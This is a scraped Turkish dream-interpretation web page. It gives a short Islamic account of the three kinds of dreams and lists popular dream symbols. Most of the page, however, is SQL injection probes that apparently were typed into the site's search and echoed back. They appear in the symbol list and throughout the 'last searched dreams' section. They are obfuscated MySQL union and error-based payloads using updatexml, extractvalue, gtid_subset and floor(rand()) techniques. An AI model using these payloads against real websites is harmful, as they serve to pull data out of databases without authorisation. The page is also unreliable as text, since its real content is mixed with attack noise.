Rüya Tabirleri Sitemize Hoşgeldiniz

En Çok Görülen Rüya Sembolleri

Çıplak Elbisenin yanmas Kiz görmek Dağ Rüyada kaz görmek Kız Diş Ayı Cami kapısı Köpek Göl Yağ Namaz kıldırmak Göl görmek Namaz kılmak Ölü Ruyada ölmüş birini gormek " order by 1-- - Rüyamda yılan gördüm ne demek Abdest hane kapısı Yılan Ruyada ölmüş birini gormek ") order by 1-- - Dükkan Ördek Rüyada yılan görmek Cam kırılması Rüyada elma görmek Kıskançlık, Akşam namazı Sabah karanlığı Kor halİne gelmİŞ odun ölmüş babasını görmek Açık elbise ,rüyada aile görmek Ruyamda kömürler ıslanmış ,sulu bir sekilde soba yakmaya çalışıyordum ama kor halinde yanıyor du Halı Sınıf Ağaç Rüyada y Ruyada ölmüş birini gormek " unIon all select null# Arkadaşlar Ağlamak Altın Bayramlaşma Ruyada ölmüş birini gormek ")) order by 1-- - Ruyada ölmüş birini gormek ") unIon all select null# Örmek Kaş Para görmek Rüyada kız görmek

İslami Rüya Tabirleri ve Rüya Yorumları Sözlüğü

Rüyalar İslâm’a göre rüya üç çeşittir.

Salih rüya,
Şeytanî rüya,
İnsanın içinde yaşadığı olaylardan doğan rüya.

Şeytanî rüya şeytanın, insanı korkutup üzüntüden üzüntüye sevk etmek için, uyku halinde insanın kalbine verdiği vesveseden ibarettir. Peygamber (sav) şöyle buyurur: Sizden biriniz sevdiği bir rüya görürse o Allah’tandır. Bunun için Allah’a hamd edip rüyasını söylesin. Hoşuna gitmediği bir rüya görürse o şeytandandır. Şerrinden Allah’a sığınsın ve onu kimseye de açmasın. Yoksa kendisine zarar verecektir.

İnsanın içinde yaşadığı olaylardan doğan rüya ise. insan bir şeyle meşgul olup onunla fazlasıyla ilgilendiği için hakkında rüya görür. Peygamber (sav) bir hadiste şöyle buyurur: Rüya üçdür. Allah tarafından olup müjde veren salih rüya, üzüntü verip şeytandan gelen rüya ve insanın kendi kendine bir şeyler söyleyip tasavvur ettiğinden meydana gelen rüya.

Yûsuf sûresinde zikredilen Hz. Yusuf (as)’ın rüyasıyla ilgili âyet ile yukarda zikredilen hadisler bunu ifade ediyorlar. Rüyaların içinde hak rüyalar vardır. Ancak her rüya haktır ve her tabir de doğrudur, denilmez. Rüyaya göre hareket ve rüyaya istinad etmek doğru değildir. Hatta fıkıh kitapları beyân ediyorlar: Şeytan her ne kadar Peygamberin suretine giremezse de Şaban’in yirmi dokuzunda Peygamber (sav) herhangi bir kimsenin rüyasında yarın Ramazan’ın birinci günüdür oruç tutunuz diye emretse de bu rüya ile amel edilmez. Çünkü, rüya ilim olmadığı gibi zabt da edilmez.

Rüya ve İlham ile Amel Etmek

Rüyalar ve İlhamlar; Rabbani ve Rahmani, Şeytani ve Nefsani olabilirler. Bu sebeple aralarını iyi belirlemek gerekir. İslam uleması bu konularda şu üç şartın yerine getirilmesi durumunda amel edilebileceğini, ama hiç kimseyi zorlamanın doğru olmadığını belirtirler.

Görülen rüya veya ilham, dinimizin emirlerinden birini kaldırıcı veya yasaklarından birini de helal edici cinsten, yani dine aykırı ve sünnete zıt olmayacak.

Rüya veya İlham güvenilir, herkesin itimat ettiği, Ebu Hanife, Şafii, İmamı Rabbani, İmamı Gazali gibi kişiler olmalıdır. Herkes o zatın yalan söylemeyeceği ve dinin esaslarını hakkıyla bilen ve yaşayan birisi olduğunu kabul etmelidir.

Rüya ve İlhamla elde edilen bilgiler dinin bir emri gibi kabul edilmemeli. Sadece tavsiye edilebilir. Rüyalar ve ilhamlar birer ikazdır, irşattır. Bağlayıcı ve zorlayıcı olamaz. Bu rüya ve İlhama uyanlar ayıplanmayacağı gibi, uymayanlar da ayıplanmaz.


Genel Bilgiler
Ortak Rüyalar
En Son Aranan Rüyalar

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/updatexml(5947,concat(0x41567271,(select/**/(elt(2836=2836,1))),0x6b5a4459),5431)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538orprocedure/**/analyse(extractvalue(8971,concat(0x4e755259,(select/**/(elt(2836=2836,1))),0x7570725a)),1)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538andprocedure/**/analyse(extractvalue(8971,concat(0x6c634339,(select/**/(elt(2836=2836,1))),0x76307135)),1)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/extractvalue(2030,concat(0x66307453,(select/**/(elt(2836=2836,1))),0x446e4635))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/extractvalue(2030,concat(0x77734237,(select/**/(elt(2836=2836,1))),0x30436771))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/json_keys((select/**/convert((select/**/concat(0x4f6c7047,(select/**/(elt(2836=2836,1))),0x70726a48))/**/usIng/**/utf8)))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/json_keys((select/**/convert((select/**/concat(0x6432734b,(select/**/(elt(2836=2836,1))),0x4e344a75))/**/usIng/**/utf8)))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/row(2018,1386)>(select/**/count(*),concat(0x68415930,(select/**/(elt(2836=2836,1))),0x525a5a7a,floor(rand(0)*2))x/**/from/**/(select/**/2027/**/unIon/**/select/**/8505/**/unIon/**/select/**/7491/**/unIon/**/select/**/4808)a/**/group/**/by/**/x)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/row(2018,1386)>(select/**/count(*),concat(0x58716e30,(select/**/(elt(2836=2836,1))),0x79684670,floor(rand(0)*2))x/**/from/**/(select/**/2027/**/unIon/**/select/**/8505/**/unIon/**/select/**/7491/**/unIon/**/select/**/4808)a/**/group/**/by/**/x)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/(select/**/5808/**/from(select/**/count(*),concat(0x6d487a32,(select/**/(elt(2836=2836,1))),0x4f587832,floor(rand(0)*2))x/**/from/**/InformatIon_schema.plugIns/**/group/**/by/**/x)a)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/(select/**/5808/**/from(select/**/count(*),concat(0x5479624d,(select/**/(elt(2836=2836,1))),0x6e4f324f,floor(rand(0)*2))x/**/from/**/InformatIon_schema.plugIns/**/group/**/by/**/x)a)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/gtId_subset(concat(0x714e4237,(select/**/(elt(2836=2836,1))),0x5a756e54),6420)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/gtId_subset(concat(0x6e4d4167,(select/**/(elt(2836=2836,1))),0x52725552),6420)/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/exp(~(select/**/*/**/from/**/(select/**/concat(0x664b5774,(select/**/(elt(2836=2836,1))),0x706e6676))x))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/exp(~(select/**/*/**/from/**/(select/**/concat(0x54694137,(select/**/(elt(2836=2836,1))),0x6d775774))x))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/or/**/(select/**/2*(If((select/**/*/**/from/**/(select/**/concat(0x4d686332,(select/**/(elt(2836=2836,1))),0x4b757264))s),/**/8446744073709551610,/**/8446744073709551610)))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/and/**/(select/**/2*(If((select/**/*/**/from/**/(select/**/concat(0x4e587357,(select/**/(elt(2836=2836,1))),0x7439596c))s),/**/8446744073709551610,/**/8446744073709551610)))/**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/unIon/**/all/**/select/**/(select/**/concat(0x5952376c,(select/**/(elt(2836=2836,1))),0x59574b65))/**//**//**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538/**/unIon/**/all/**/select/**/(select/**/concat(0x44735268,(null),0x61704851))/**//**//**/and/**/6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/row(2018,1386)>(select/**/count(*),concat(0x64626c30,(select/**/(elt(2836=2836,1))),0x6a50454c,floor(rand(0)*2))x/**/from/**/(select/**/2027/**/unIon/**/select/**/8505/**/unIon/**/select/**/7491/**/unIon/**/select/**/4808)a/**/group/**/by/**/x)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/row(2018,1386)>(select/**/count(*),concat(0x75414334,(select/**/(elt(2836=2836,1))),0x4b457356,floor(rand(0)*2))x/**/from/**/(select/**/2027/**/unIon/**/select/**/8505/**/unIon/**/select/**/7491/**/unIon/**/select/**/4808)a/**/group/**/by/**/x)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/(select/**/5808/**/from(select/**/count(*),concat(0x754c6641,(select/**/(elt(2836=2836,1))),0x74775872,floor(rand(0)*2))x/**/from/**/InformatIon_schema.plugIns/**/group/**/by/**/x)a)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/(select/**/5808/**/from(select/**/count(*),concat(0x7274776a,(select/**/(elt(2836=2836,1))),0x69595937,floor(rand(0)*2))x/**/from/**/InformatIon_schema.plugIns/**/group/**/by/**/x)a)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/gtId_subset(concat(0x364e306b,(select/**/(elt(2836=2836,1))),0x4b386878),6420)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/gtId_subset(concat(0x59626738,(select/**/(elt(2836=2836,1))),0x44717a52),6420)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/exp(~(select/**/*/**/from/**/(select/**/concat(0x6e777746,(select/**/(elt(2836=2836,1))),0x74474b33))x))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/exp(~(select/**/*/**/from/**/(select/**/concat(0x616d6e32,(select/**/(elt(2836=2836,1))),0x36504c54))x))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/(select/**/2*(If((select/**/*/**/from/**/(select/**/concat(0x52494353,(select/**/(elt(2836=2836,1))),0x566b3457))s),/**/8446744073709551610,/**/8446744073709551610)))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/(select/**/2*(If((select/**/*/**/from/**/(select/**/concat(0x4d6f4b45,(select/**/(elt(2836=2836,1))),0x3375614f))s),/**/8446744073709551610,/**/8446744073709551610)))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/1/**/group/**/by/**/concat(0x35735376,(select/**/(elt(2836=2836,1))),0x6e4f3377,floor(rand(0)*2))/**/havIng/**/mIn(0)#/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/1/**/group/**/by/**/concat(0x37726676,(select/**/(elt(2836=2836,1))),0x44467077,floor(rand(0)*2))/**/havIng/**/mIn(0)#/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/updatexml(5947,concat(0x62567168,(select/**/(elt(2836=2836,1))),0x44334d57),5431)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/updatexml(5947,concat(0x4a4a4f53,(select/**/(elt(2836=2836,1))),0x56724670),5431)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))orprocedure/**/analyse(extractvalue(8971,concat(0x306c7554,(select/**/(elt(2836=2836,1))),0x33336a48)),1)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))andprocedure/**/analyse(extractvalue(8971,concat(0x52596b4c,(select/**/(elt(2836=2836,1))),0x32426564)),1)/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/extractvalue(2030,concat(0x61384246,(select/**/(elt(2836=2836,1))),0x784e6b39))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/extractvalue(2030,concat(0x61316242,(select/**/(elt(2836=2836,1))),0x504e5470))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/or/**/json_keys((select/**/convert((select/**/concat(0x5144594b,(select/**/(elt(2836=2836,1))),0x6c536c75))/**/usIng/**/utf8)))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/unIon/**/all/**/select/**/(select/**/concat(0x6c623835,(select/**/(elt(2836=2836,1))),0x6b6d4858))/**//**//**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/and/**/json_keys((select/**/convert((select/**/concat(0x37727231,(select/**/(elt(2836=2836,1))),0x59334745))/**/usIng/**/utf8)))/**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538)))/**/unIon/**/all/**/select/**/(select/**/concat(0x45757639,(null),0x346f6b53))/**//**//**/and/**/(((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/or/**/row(2018,1386)>(select/**/count(*),concat(0x4a4d5a5a,(select/**/(elt(2836=2836,1))),0x6a4c7469,floor(rand(0)*2))x/**/from/**/(select/**/2027/**/unIon/**/select/**/8505/**/unIon/**/select/**/7491/**/unIon/**/select/**/4808)a/**/group/**/by/**/x)/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/and/**/row(2018,1386)>(select/**/count(*),concat(0x6769554b,(select/**/(elt(2836=2836,1))),0x3848646c,floor(rand(0)*2))x/**/from/**/(select/**/2027/**/unIon/**/select/**/8505/**/unIon/**/select/**/7491/**/unIon/**/select/**/4808)a/**/group/**/by/**/x)/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/or/**/(select/**/5808/**/from(select/**/count(*),concat(0x63643471,(select/**/(elt(2836=2836,1))),0x3538337a,floor(rand(0)*2))x/**/from/**/InformatIon_schema.plugIns/**/group/**/by/**/x)a)/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/and/**/(select/**/5808/**/from(select/**/count(*),concat(0x316a6975,(select/**/(elt(2836=2836,1))),0x4d655245,floor(rand(0)*2))x/**/from/**/InformatIon_schema.plugIns/**/group/**/by/**/x)a)/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/or/**/gtId_subset(concat(0x4f63397a,(select/**/(elt(2836=2836,1))),0x42395a69),6420)/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/and/**/gtId_subset(concat(0x4e377257,(select/**/(elt(2836=2836,1))),0x35543263),6420)/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/or/**/exp(~(select/**/*/**/from/**/(select/**/concat(0x7042396e,(select/**/(elt(2836=2836,1))),0x7434304a))x))/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/and/**/exp(~(select/**/*/**/from/**/(select/**/concat(0x4e41436c,(select/**/(elt(2836=2836,1))),0x5a457975))x))/**/and/**/((6538=6538

Ruyada öldüğünü gormek/**/and/**/6538=6538))/**/or/**/(select/**/2*(If((select/**/*/**/from/**/(select/**/concat(0x50416f5a,(select/**/(elt(2836=2836,1))),0x56714950))s),/**/8446744073709551610,/**/8446744073709551610)))/**/and/**/((6538=6538